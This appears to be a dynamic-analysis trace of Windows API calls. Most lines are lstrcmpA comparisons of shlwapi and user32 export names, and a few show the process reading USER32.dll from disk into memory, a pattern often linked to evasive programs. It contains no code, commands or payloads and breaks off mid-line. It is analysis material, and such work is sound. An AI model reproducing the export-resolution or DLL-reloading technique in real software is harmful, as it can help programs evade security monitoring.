lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0132.724] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0132.725] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0132.725] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0132.725] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0132.726] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0132.726] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0132.726] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0132.726] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0132.726] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0132.726] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0132.726] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0132.727] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0132.727] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0132.727] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0132.728] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0132.728] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0132.729] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0132.729] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0132.730] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0132.730] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0132.730] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0132.731] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0132.731] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0132.732] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0132.732] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0132.732] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0132.732] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0132.916] GetProcessHeap () returned 0x460000 [0132.916] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x2cb5030 | out: hHeap=0x460000) returned 1 [0132.916] GetProcessHeap () returned 0x460000 [0132.916] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479130 [0132.916] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0132.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0132.916] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0132.916] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0132.916] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0132.917] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0132.917] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0132.917] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0132.917] GetProcessHeap () returned 0x460000 [0132.917] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1555b8) returned 0x407f040 [0132.921] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0132.921] ReadFile (in: hFile=0x17c, lpBuffer=0x407f040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x407f040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0132.951] CloseHandle (hObject=0x17c) returned 1 [0133.153] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0133.153] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0133.153] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0133.153] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0133.153] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0133.153] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0133.153] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0133.153] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0133.153] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0133.153] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0133.153] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0133.153] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0133.153] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0133.153] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0133.153] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0133.153] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0133.153] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0133.153] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0133.153] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0133.153] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0133.154] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0133.154] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0133.154] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0133.154] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0133.155] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0133.155] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0133.156] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0133.156] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0133.156] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0133.156] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0133.156] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0133.156] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0133.157] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0133.157] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0133.157] lstrcmpA 